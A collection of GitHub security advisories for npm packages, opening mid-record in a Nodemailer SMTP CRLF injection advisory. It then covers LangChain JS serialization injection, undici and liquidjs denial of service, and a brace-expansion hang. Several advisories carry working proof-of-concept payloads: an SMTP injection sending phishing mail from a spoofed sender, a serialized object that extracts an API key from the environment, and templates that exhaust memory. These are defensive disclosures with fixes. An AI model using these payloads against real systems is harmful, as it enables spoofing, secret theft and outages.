\u0027127.0.0.1\u0027,\n port: port,\n secure: false,\n name: \u0027legit.host\\r\\nMAIL FROM:\u003cattacker@evil.com\u003e\\r\\n\u0027\n + \u0027RCPT TO:\u003cvictim@target.com\u003e\\r\\nDATA\\r\\n\u0027\n + \u0027From: ceo@company.com\\r\\nTo: victim@target.com\\r\\n\u0027\n + \u0027Subject: Urgent\\r\\n\\r\\nPhishing content\\r\\n.\\r\\nRSET\u0027\n });\n\n transport.sendMail({\n from: \u0027legit@example.com\u0027,\n to: \u0027legit-recipient@example.com\u0027,\n subject: \u0027Normal email\u0027,\n text: \u0027Normal content\u0027\n }, () =\u003e { server.close(); process.exit(0); });\n});\n```\n\nRunning this PoC shows the SMTP server receives the injected MAIL FROM, RCPT TO, DATA, and phishing email content as separate SMTP commands before the legitimate email is sent.\n\n### Impact\n\n**Who is affected:** Applications that allow users or external input to configure the `name` SMTP transport option. This includes:\n- Multi-tenant SaaS platforms with per-tenant SMTP configuration\n- Admin panels where SMTP hostname/name settings are stored in databases\n- Applications loading SMTP config from environment variables or external sources\n\n**What can an attacker do:**\n1. **Send unauthorized emails** to arbitrary recipients by injecting MAIL FROM and RCPT TO commands\n2. **Spoof email senders** by injecting arbitrary From headers in the DATA portion\n3. **Conduct phishing attacks** using the legitimate SMTP server as a relay\n4. **Bypass application-level controls** on email recipients, since the injected commands are processed before the application\u0027s intended MAIL FROM/RCPT TO\n5. **Perform SMTP reconnaissance** by injecting commands like VRFY or EXPN\n\nThe injection occurs at the EHLO stage (before authentication in most SMTP flows), making it particularly dangerous as the injected commands may be processed with the server\u0027s trust context.\n\n**Recommended fix:** Sanitize the `name` option by stripping or rejecting CRLF sequences, similar to how `envelope.from` and `envelope.to` are already validated on lines 1107-1119 of `lib/smtp-connection/index.js`. For example:\n\n```javascript\nthis.name = (this.options.name || this._getHostname()).replace(/[\\r\\n]/g, \u0027\u0027);\n```",
"id": "GHSA-vvjj-xcjg-gr5g",
"modified": "2026-04-08T15:05:20Z",
"published": "2026-04-08T15:05:20Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-vvjj-xcjg-gr5g"
},
{
"type": "WEB",
"url": "https://github.com/nodemailer/nodemailer/commit/0a43876801a420ca528f492eaa01bfc421cc306e"
},
{
"type": "PACKAGE",
"url": "https://github.com/nodemailer/nodemailer"
},
{
"type": "WEB",
"url": "https://github.com/nodemailer/nodemailer/releases/tag/v8.0.5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Nodemailer Vulnerable to SMTP Command Injection via CRLF in Transport name Option (EHLO/HELO) "
}
GHSA-R399-636X-V7F6
Vulnerability from github – Published: 2025-12-23 20:08 – Updated: 2025-12-24 01:08Context
A serialization injection vulnerability exists in LangChain JS's toJSON() method (and subsequently when string-ifying objects using JSON.stringify(). The method did not escape objects with 'lc' keys when serializing free-form data in kwargs. The 'lc' key is used internally by LangChain to mark serialized objects. When user-controlled data contains this key structure, it is treated as a legitimate LangChain object during deserialization rather than plain user data.
Attack surface
The core vulnerability was in Serializable.toJSON(): this method failed to escape user-controlled objects containing 'lc' keys within kwargs (e.g., additional_kwargs, metadata, response_metadata). When this unescaped data was later deserialized via load(), the injected structures were treated as legitimate LangChain objects rather than plain user data.
This escaping bug enabled several attack vectors:
- Injection via user data: Malicious LangChain object structures could be injected through user-controlled fields like
metadata,additional_kwargs, orresponse_metadata - Secret extraction: Injected secret structures could extract environment variables when
secretsFromEnvwas enabled (which had no explicit default, effectively defaulting totruebehavior) - Class instantiation via import maps: Injected constructor structures could instantiate any class available in the provided import maps with attacker-controlled parameters
Note on import maps: Classes must be explicitly included in import maps to be instantiatable. The core import map includes standard types (messages, prompts, documents), and users can extend this via importMap and optionalImportsMap options. This architecture naturally limits the attack surface—an allowedObjects parameter is not necessary because users control which classes are available through the import maps they provide.
Security hardening: This patch fixes the escaping bug in toJSON() and introduces new restrictive defaults in load(): secretsFromEnv now explicitly defaults to false, and a maxDepth parameter protects against DoS via deeply nested structures. JSDoc security warnings have been added to all import map options.
Who is affected?
Applications are vulnerable if they:
- Serialize untrusted data via
JSON.stringify()on Serializable objects, then deserialize withload()— Trusting your own serialization output makes you vulnerable if user-controlled data (e.g., from LLM responses, metadata fields, or user inputs) contains'lc'key structures. - Deserialize untrusted data with
load()— Directly deserializing untrusted data that may contain injected'lc'structures. - Use LangGraph checkpoints — Checkpoint serialization/deserialization paths may be affected.
The most common attack vector is through LLM response fields like additional_kwargs or response_metadata, which can be controlled via prompt injection and then serialized/deserialized in streaming operations.
Impact
Attackers who control serialized data can extract environment variable secrets by injecting {"lc": 1, "type": "secret", "id": ["ENV_VAR"]} to load environment variables during deserialization (when secretsFromEnv: true). They can also instantiate classes with controlled parameters by injecting constructor structures to instantiate any class within the provided import maps with attacker-controlled parameters, potentially triggering side effects such as network calls or file operations.
Key severity factors:
- Affects the serialization path—applications trusting their own serialization output are vulnerable
- Enables secret extraction when combined with
secretsFromEnv: true - LLM responses in
additional_kwargscan be controlled via prompt injection
Exploit example
import { load } from "@langchain/core/load";
// Attacker injects secret structure into user-controlled data
const attackerPayload = JSON.stringify({
user_data: {
lc: 1,
type: "secret",
id: ["OPENAI_API_KEY"],
},
});
process.env.OPENAI_API_KEY = "sk-secret-key-12345";
// With secretsFromEnv: true, the secret is extracted
const deserialized = await load(attackerPayload, { secretsFromEnv: true });
console.log(deserialized.user_data); // "sk-secret-key-12345" - SECRET LEAKED!
Security hardening changes
This patch introduces the following changes to load():
secretsFromEnvdefault changed tofalse: Disables automatic secret loading from environment variables. Secrets not found insecretsMapnow throw an error instead of being loaded fromprocess.env. This fail-safe behavior ensures missing secrets are caught immediately rather than silently continuing withnull.- New
maxDepthparameter (defaults to50): Protects against denial-of-service attacks via deeply nested JSON structures that could cause stack overflow. - Escape mechanism in
toJSON(): User-controlled objects containing'lc'keys are now wrapped in{"__lc_escaped__": {...}}during serialization and unwrapped as plain data during deserialization. - JSDoc security warnings: All import map options (
importMap,optionalImportsMap,optionalImportEntrypoints) now include security warnings about never populating them from user input.
Migration guide
No changes needed for most users
If you're deserializing standard LangChain types (messages, documents, prompts) using the core import map, your code will work without changes:
import { load } from "@langchain/core/load";
// Works with default settings
const obj = await load(serializedData);
For secrets from environment
secretsFromEnv now defaults to false, and missing secrets throw an error. If you need to load secrets:
import { load } from "@langchain/core/load";
// Provide secrets explicitly (recommended)
const obj = await load(serializedData, {
secretsMap: { OPENAI_API_KEY: process.env.OPENAI_API_KEY },
});
// Or explicitly opt-in to load from env (only use with trusted data)
const obj = await load(serializedData, { secretsFromEnv: true });
Warning: Only enable
secretsFromEnvif you trust the serialized data. Untrusted data could extract any environment variable.Note: If a secret reference is encountered but not found in
secretsMap(andsecretsFromEnvisfalseor the secret is not in the environment), an error is thrown. This fail-safe behavior ensures you're aware of missing secrets rather than silently receivingnullvalues.
For deeply nested structures
If you have legitimate deeply nested data that exceeds the default depth limit of 50:
import { load } from "@langchain/core/load";
const obj = await load(serializedData, { maxDepth: 100 });
For custom import maps
If you provide custom import maps, ensure they only contain trusted modules:
import { load } from "@langchain/core/load";
import * as myModule from "./my-trusted-module";
// GOOD - explicitly include only trusted modules
const obj = await load(serializedData, {
importMap: { my_module: myModule },
});
// BAD - never populate from user input
const obj = await load(serializedData, {
importMap: userProvidedImports, // DANGEROUS!
});
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@langchain/core"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "1.1.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@langchain/core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.3.80"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "langchain"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "1.2.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "langchain"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.3.37"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-68665"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-23T20:08:48Z",
"nvd_published_at": "2025-12-23T23:15:45Z",
"severity": "HIGH"
},
"details": "## Context\n\nA serialization injection vulnerability exists in LangChain JS\u0027s `toJSON()` method (and subsequently when string-ifying objects using `JSON.stringify()`. The method did not escape objects with `\u0027lc\u0027` keys when serializing free-form data in kwargs. The `\u0027lc\u0027` key is used internally by LangChain to mark serialized objects. When user-controlled data contains this key structure, it is treated as a legitimate LangChain object during deserialization rather than plain user data.\n\n### Attack surface\n\nThe core vulnerability was in `Serializable.toJSON()`: this method failed to escape user-controlled objects containing `\u0027lc\u0027` keys within kwargs (e.g., `additional_kwargs`, `metadata`, `response_metadata`). When this unescaped data was later deserialized via `load()`, the injected structures were treated as legitimate LangChain objects rather than plain user data.\n\nThis escaping bug enabled several attack vectors:\n\n1. **Injection via user data**: Malicious LangChain object structures could be injected through user-controlled fields like `metadata`, `additional_kwargs`, or `response_metadata`\n2. **Secret extraction**: Injected secret structures could extract environment variables when `secretsFromEnv` was enabled (which had no explicit default, effectively defaulting to `true` behavior)\n3. **Class instantiation via import maps**: Injected constructor structures could instantiate any class available in the provided import maps with attacker-controlled parameters\n\n**Note on import maps:** Classes must be explicitly included in import maps to be instantiatable. The core import map includes standard types (messages, prompts, documents), and users can extend this via `importMap` and `optionalImportsMap` options. This architecture naturally limits the attack surface\u2014an `allowedObjects` parameter is not necessary because users control which classes are available through the import maps they provide.\n\n**Security hardening:** This patch fixes the escaping bug in `toJSON()` and introduces new restrictive defaults in `load()`: `secretsFromEnv` now explicitly defaults to `false`, and a `maxDepth` parameter protects against DoS via deeply nested structures. JSDoc security warnings have been added to all import map options.\n\n## Who is affected?\n\nApplications are vulnerable if they:\n\n1. **Serialize untrusted data via `JSON.stringify()` on Serializable objects, then deserialize with `load()`** \u2014 Trusting your own serialization output makes you vulnerable if user-controlled data (e.g., from LLM responses, metadata fields, or user inputs) contains `\u0027lc\u0027` key structures.\n2. **Deserialize untrusted data with `load()`** \u2014 Directly deserializing untrusted data that may contain injected `\u0027lc\u0027` structures.\n3. **Use LangGraph checkpoints** \u2014 Checkpoint serialization/deserialization paths may be affected.\n\nThe most common attack vector is through **LLM response fields** like `additional_kwargs` or `response_metadata`, which can be controlled via prompt injection and then serialized/deserialized in streaming operations.\n\n## Impact\n\nAttackers who control serialized data can extract environment variable secrets by injecting `{\"lc\": 1, \"type\": \"secret\", \"id\": [\"ENV_VAR\"]}` to load environment variables during deserialization (when `secretsFromEnv: true`). They can also instantiate classes with controlled parameters by injecting constructor structures to instantiate any class within the provided import maps with attacker-controlled parameters, potentially triggering side effects such as network calls or file operations.\n\nKey severity factors:\n\n- Affects the serialization path\u2014applications trusting their own serialization output are vulnerable\n- Enables secret extraction when combined with `secretsFromEnv: true`\n- LLM responses in `additional_kwargs` can be controlled via prompt injection\n\n## Exploit example\n\n```typescript\nimport { load } from \"@langchain/core/load\";\n\n// Attacker injects secret structure into user-controlled data\nconst attackerPayload = JSON.stringify({\n user_data: {\n lc: 1,\n type: \"secret\",\n id: [\"OPENAI_API_KEY\"],\n },\n});\n\nprocess.env.OPENAI_API_KEY = \"sk-secret-key-12345\";\n\n// With secretsFromEnv: true, the secret is extracted\nconst deserialized = await load(attackerPayload, { secretsFromEnv: true });\n\nconsole.log(deserialized.user_data); // \"sk-secret-key-12345\" - SECRET LEAKED!\n```\n\n## Security hardening changes\n\nThis patch introduces the following changes to `load()`:\n\n1. **`secretsFromEnv` default changed to `false`**: Disables automatic secret loading from environment variables. Secrets not found in `secretsMap` now throw an error instead of being loaded from `process.env`. This fail-safe behavior ensures missing secrets are caught immediately rather than silently continuing with `null`.\n2. **New `maxDepth` parameter** (defaults to `50`): Protects against denial-of-service attacks via deeply nested JSON structures that could cause stack overflow.\n3. **Escape mechanism in `toJSON()`**: User-controlled objects containing `\u0027lc\u0027` keys are now wrapped in `{\"__lc_escaped__\": {...}}` during serialization and unwrapped as plain data during deserialization.\n4. **JSDoc security warnings**: All import map options (`importMap`, `optionalImportsMap`, `optionalImportEntrypoints`) now include security warnings about never populating them from user input.\n\n## Migration guide\n\n### No changes needed for most users\n\nIf you\u0027re deserializing standard LangChain types (messages, documents, prompts) using the core import map, your code will work without changes:\n\n```typescript\nimport { load } from \"@langchain/core/load\";\n\n// Works with default settings\nconst obj = await load(serializedData);\n```\n\n### For secrets from environment\n\n`secretsFromEnv` now defaults to `false`, and missing secrets throw an error. If you need to load secrets:\n\n```typescript\nimport { load } from \"@langchain/core/load\";\n\n// Provide secrets explicitly (recommended)\nconst obj = await load(serializedData, {\n secretsMap: { OPENAI_API_KEY: process.env.OPENAI_API_KEY },\n});\n\n// Or explicitly opt-in to load from env (only use with trusted data)\nconst obj = await load(serializedData, { secretsFromEnv: true });\n```\n\n\u003e **Warning:** Only enable `secretsFromEnv` if you trust the serialized data. Untrusted data could extract any environment variable.\n\n\u003e **Note:** If a secret reference is encountered but not found in `secretsMap` (and `secretsFromEnv` is `false` or the secret is not in the environment), an error is thrown. This fail-safe behavior ensures you\u0027re aware of missing secrets rather than silently receiving `null` values.\n\n### For deeply nested structures\n\nIf you have legitimate deeply nested data that exceeds the default depth limit of 50:\n\n```typescript\nimport { load } from \"@langchain/core/load\";\n\nconst obj = await load(serializedData, { maxDepth: 100 });\n```\n\n### For custom import maps\n\nIf you provide custom import maps, ensure they only contain trusted modules:\n\n```typescript\nimport { load } from \"@langchain/core/load\";\nimport * as myModule from \"./my-trusted-module\";\n\n// GOOD - explicitly include only trusted modules\nconst obj = await load(serializedData, {\n importMap: { my_module: myModule },\n});\n\n// BAD - never populate from user input\nconst obj = await load(serializedData, {\n importMap: userProvidedImports, // DANGEROUS!\n});\n```",
"id": "GHSA-r399-636x-v7f6",
"modified": "2025-12-24T01:08:11Z",
"published": "2025-12-23T20:08:48Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/langchain-ai/langchainjs/security/advisories/GHSA-r399-636x-v7f6"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68665"
},
{
"type": "WEB",
"url": "https://github.com/langchain-ai/langchainjs/commit/e5063f9c6e9989ea067dfdff39262b9e7b6aba62"
},
{
"type": "PACKAGE",
"url": "https://github.com/langchain-ai/langchainjs"
},
{
"type": "WEB",
"url": "https://github.com/langchain-ai/langchainjs/releases/tag/%40langchain%2Fcore%401.1.8"
},
{
"type": "WEB",
"url": "https://github.com/langchain-ai/langchainjs/releases/tag/langchain%401.2.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "LangChain serialization injection vulnerability enables secret extraction"
}
GHSA-V9P9-HFJ2-HCW8
Vulnerability from github – Published: 2026-03-13 20:41 – Updated: 2026-03-13 20:41Impact
The undici WebSocket client is vulnerable to a denial-of-service attack due to improper validation of the server_max_window_bits parameter in the permessage-deflate extension. When a WebSocket client connects to a server, it automatically advertises support for permessage-deflate compression. A malicious server can respond with an out-of-range server_max_window_bits value (outside zlib's valid range of 8-15). When the server subsequently sends a compressed frame, the client attempts to create a zlib InflateRaw instance with the invalid windowBits value, causing a synchronous RangeError exception that is not caught, resulting in immediate process termination.
The vulnerability exists because:
- The
isValidClientWindowBits()function only validates that the value contains ASCII digits, not that it falls within the valid range 8-15 - The
createInflateRaw()call is not wrapped in a try-catch block - The resulting exception propagates up through the call stack and crashes the Node.js process
Patches
Has the problem been patched? What versions should users upgrade to?
Workarounds
Is there a way for users to fix or remediate the vulnerability without upgrading?
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "undici"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.24.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "undici"
},
"ranges": [
{
"events": [
{
"introduced": "7.0.0"
},
{
"fixed": "7.24.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-2229"
],
"database_specific": {
"cwe_ids": [
"CWE-248"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-13T20:41:41Z",
"nvd_published_at": "2026-03-12T21:16:25Z",
"severity": "HIGH"
},
"details": "### Impact\n\nThe undici WebSocket client is vulnerable to a denial-of-service attack due to improper validation of the `server_max_window_bits` parameter in the permessage-deflate extension. When a WebSocket client connects to a server, it automatically advertises support for permessage-deflate compression. A malicious server can respond with an out-of-range `server_max_window_bits` value (outside zlib\u0027s valid range of 8-15). When the server subsequently sends a compressed frame, the client attempts to create a zlib InflateRaw instance with the invalid windowBits value, causing a synchronous RangeError exception that is not caught, resulting in immediate process termination.\n\nThe vulnerability exists because:\n\n1. The `isValidClientWindowBits()` function only validates that the value contains ASCII digits, not that it falls within the valid range 8-15\n2. The `createInflateRaw()` call is not wrapped in a try-catch block\n3. The resulting exception propagates up through the call stack and crashes the Node.js process\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_",
"id": "GHSA-v9p9-hfj2-hcw8",
"modified": "2026-03-13T20:41:41Z",
"published": "2026-03-13T20:41:41Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nodejs/undici/security/advisories/GHSA-v9p9-hfj2-hcw8"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2229"
},
{
"type": "WEB",
"url": "https://hackerone.com/reports/3487486"
},
{
"type": "WEB",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"type": "WEB",
"url": "https://datatracker.ietf.org/doc/html/rfc7692"
},
{
"type": "PACKAGE",
"url": "https://github.com/nodejs/undici"
},
{
"type": "WEB",
"url": "https://nodejs.org/api/zlib.html#class-zlibinflateraw"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Undici has Unhandled Exception in WebSocket Client Due to Invalid server_max_window_bits Validation"
}
GHSA-4RC3-7J7W-M548
Vulnerability from github – Published: 2026-04-24 15:34 – Updated: 2026-05-13 13:38Summary
A circular block reference in {% layout %} / {% block %} causes an infinite recursive loop, consuming all available memory (~4GB) and crashing the Node.js process with FATAL ERROR: JavaScript heap out of memory. This allows any user who can submit a Liquid template to perform a Denial of Service attack.
Details
In src/tags/block.ts, during OUTPUT mode, each block looks up its render function from ctx.getRegister('blocks')[this.block]. When a block with name a is nested inside another block also named a in a child template, the inner block finds the outer block's render function and calls it. The outer block's templates contain the inner block again, creating infinite recursion with no termination condition.
Relevant code (src/tags/block.ts, getBlockRender method):
private getBlockRender (ctx: Context) {
const { liquid, templates } = this
const renderChild = ctx.getRegister('blocks')[this.block]
const renderCurrent = function * (superBlock: BlockDrop, emitter: Emitter) {
ctx.push({ block: superBlock })
yield liquid.renderer.renderTemplates(templates, ctx, emitter)
ctx.pop()
}
return renderChild
? (superBlock: BlockDrop, emitter: Emitter) => renderChild(
new BlockDrop(
(emitter: Emitter) => renderCurrent(superBlock, emitter)
),
emitter)
: renderCurrent
}
When renderChild exists (same-name block found), it calls renderChild which re-renders templates containing the nested block, which again finds renderChild, and so on — infinite loop.
PoC
1. Create a layout file (layout.html):
<header>{% block a %}default-a{% endblock %}</header>
<main>{% block b %}default-b{% endblock %}</main>
<footer>{% block c %}default-c{% endblock %}</footer>
2. Create a template that uses the layout:
{% layout "layout" %}
{% block a %}outer-a {% block a %}inner-a{% endblock %}{% endblock %}
{% block b %}content-b{% endblock %}
{% block c %}content-c{% endblock %}
3. Render:
const { Liquid } = require('liquidjs')
const liquid = new Liquid({ root: './', extname: '.html' })
liquid.renderFile('template').then(console.log)
// Result: process hangs, memory grows to ~4GB, then crashes with OOM
The anonymous block variant also triggers the same issue:
{% layout "parent" %}
{%block%}A{%block%}B{%endblock%}{%endblock%}
Impact
Denial of Service (DoS). Any application that accepts user-provided or user-influenced Liquid templates — such as CMS platforms, email template builders, multi-tenant SaaS products, or static site generators with untrusted input — can be crashed by a single malicious template. The attack requires no authentication beyond the ability to submit a template, and no special configuration. The Node.js process is killed by the OS due to memory exhaustion, causing complete service disruption.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "liquidjs"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "10.25.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-41311"
],
"database_specific": {
"cwe_ids": [
"CWE-674"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-24T15:34:00Z",
"nvd_published_at": "2026-05-09T04:16:21Z",
"severity": "HIGH"
},
"details": "### Summary\n\nA circular block reference in `{% layout %}` / `{% block %}` causes an infinite recursive loop, consuming all available memory (~4GB) and crashing the Node.js process with `FATAL ERROR: JavaScript heap out of memory`. This allows any user who can submit a Liquid template to perform a Denial of Service attack.\n\n### Details\n\nIn `src/tags/block.ts`, during OUTPUT mode, each block looks up its render function from `ctx.getRegister(\u0027blocks\u0027)[this.block]`. When a block with name `a` is nested inside another block also named `a` in a child template, the inner block finds the outer block\u0027s render function and calls it. The outer block\u0027s templates contain the inner block again, creating infinite recursion with no termination condition.\n\nRelevant code (`src/tags/block.ts`, `getBlockRender` method):\n\n```typescript\nprivate getBlockRender (ctx: Context) {\n const { liquid, templates } = this\n const renderChild = ctx.getRegister(\u0027blocks\u0027)[this.block]\n const renderCurrent = function * (superBlock: BlockDrop, emitter: Emitter) {\n ctx.push({ block: superBlock })\n yield liquid.renderer.renderTemplates(templates, ctx, emitter)\n ctx.pop()\n }\n return renderChild\n ? (superBlock: BlockDrop, emitter: Emitter) =\u003e renderChild(\n new BlockDrop(\n (emitter: Emitter) =\u003e renderCurrent(superBlock, emitter)\n ),\n emitter)\n : renderCurrent\n}\n```\n\nWhen `renderChild` exists (same-name block found), it calls `renderChild` which re-renders templates containing the nested block, which again finds `renderChild`, and so on \u2014 infinite loop.\n\n### PoC\n\n**1. Create a layout file** (`layout.html`):\n\n```liquid\n\u003cheader\u003e{% block a %}default-a{% endblock %}\u003c/header\u003e\n\u003cmain\u003e{% block b %}default-b{% endblock %}\u003c/main\u003e\n\u003cfooter\u003e{% block c %}default-c{% endblock %}\u003c/footer\u003e\n```\n\n**2. Create a template that uses the layout:**\n\n```liquid\n{% layout \"layout\" %}\n{% block a %}outer-a {% block a %}inner-a{% endblock %}{% endblock %}\n{% block b %}content-b{% endblock %}\n{% block c %}content-c{% endblock %}\n```\n\n**3. Render:**\n\n```javascript\nconst { Liquid } = require(\u0027liquidjs\u0027)\nconst liquid = new Liquid({ root: \u0027./\u0027, extname: \u0027.html\u0027 })\nliquid.renderFile(\u0027template\u0027).then(console.log)\n// Result: process hangs, memory grows to ~4GB, then crashes with OOM\n```\n\nThe anonymous block variant also triggers the same issue:\n\n```liquid\n{% layout \"parent\" %}\n{%block%}A{%block%}B{%endblock%}{%endblock%}\n```\n\n### Impact\n\n**Denial of Service (DoS).** Any application that accepts user-provided or user-influenced Liquid templates \u2014 such as CMS platforms, email template builders, multi-tenant SaaS products, or static site generators with untrusted input \u2014 can be crashed by a single malicious template. The attack requires no authentication beyond the ability to submit a template, and no special configuration. The Node.js process is killed by the OS due to memory exhaustion, causing complete service disruption.",
"id": "GHSA-4rc3-7j7w-m548",
"modified": "2026-05-13T13:38:38Z",
"published": "2026-04-24T15:34:00Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/harttle/liquidjs/security/advisories/GHSA-4rc3-7j7w-m548"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41311"
},
{
"type": "WEB",
"url": "https://github.com/harttle/liquidjs/commit/e2311dfd6e82f73509308aa8a3a1fafc92e226f0"
},
{
"type": "PACKAGE",
"url": "https://github.com/harttle/liquidjs"
},
{
"type": "WEB",
"url": "https://github.com/harttle/liquidjs/releases/tag/v10.25.7"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "liquidjs has a Denial of Service via circular block reference in layout"
}
GHSA-F886-M6HF-6M8V
Vulnerability from github – Published: 2026-03-26 18:29 – Updated: 2026-03-27 21:38Impact
A brace pattern with a zero step value (e.g., {1..2..0}) causes the sequence generation loop to run indefinitely, making the process hang for seconds and allocate heaps of memory.
The loop in question:
https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184
test() is one of
https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113
The increment is computed as Math.abs(0) = 0, so the loop variable never advances. On a test machine, the process hangs for about 3.5 seconds and allocates roughly 1.9 GB of memory before throwing a RangeError. Setting max to any value has no effect because the limit is only checked at the output combination step, not during sequence generation.
This affects any application that passes untrusted strings to expand(), or by error sets a step value of 0. That includes tools built on minimatch/glob that resolve patterns from CLI arguments or config files. The input needed is just 10 bytes.
Patches
Upgrade to versions - 5.0.5+
A step increment of 0 is now sanitized to 1, which matches bash behavior.
Workarounds
Sanitize strings passed to expand() to ensure a step value of 0 is not used.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "brace-expansion"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "5.0.5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "brace-expansion"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.0.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "brace-expansion"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.0.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "brace-expansion"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.1.13"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33750"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-26T18:29:42Z",
"nvd_published_at": "2026-03-27T15:16:57Z",
"severity": "MODERATE"
},
"details": "### Impact\n\nA brace pattern with a zero step value (e.g., `{1..2..0}`) causes the sequence generation loop to run indefinitely, making the process hang for seconds and allocate heaps of memory.\n\nThe loop in question:\n\nhttps://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184\n\n`test()` is one of\n\nhttps://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113\n\nThe increment is computed as `Math.abs(0) = 0`, so the loop variable never advances. On a test machine, the process hangs for about 3.5 seconds and allocates roughly 1.9 GB of memory before throwing a `RangeError`. Setting max to any value has no effect because the limit is only checked at the output combination step, not during sequence generation.\n\nThis affects any application that passes untrusted strings to expand(), or by error sets a step value of `0`. That includes tools built on minimatch/glob that resolve patterns from CLI arguments or config files. The input needed is just 10 bytes.\n\n### Patches\n\n\nUpgrade to versions\n- 5.0.5+\n\nA step increment of 0 is now sanitized to 1, which matches bash behavior.\n\n### Workarounds\n\nSanitize strings passed to `expand()` to ensure a step value of `0` is not used.",
"id": "GHSA-f886-m6hf-6m8v",
"modified": "2026-03-27T21:38:55Z",
"published": "2026-03-26T18:29:42Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33750"
},
{
"type": "WEB",
"url": "https://github.com/juliangruber/brace-expansion/issues/98"
},
{
"type": "WEB",
"url": "https://github.com/juliangruber/brace-expansion/pull/95"
},
{
"type": "WEB",
"url": "https://github.com/juliangruber/brace-expansion/pull/96"
},
{
"type": "WEB",
"url": "https://github.com/juliangruber/brace-expansion/pull/97"
},
{
"type": "WEB",
"url": "https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5"
},
{
"type": "WEB",
"url": "https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2"
},
{
"type": "WEB",
"url": "https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a"
},
{
"type": "PACKAGE",
"url": "https://github.com/juliangruber/brace-expansion"
},
{
"type": "WEB",
"url": "https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113"
},
{
"type": "WEB",
"url": "https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "brace-expansion: Zero-step sequence causes process hang and memory exhaustion"
}
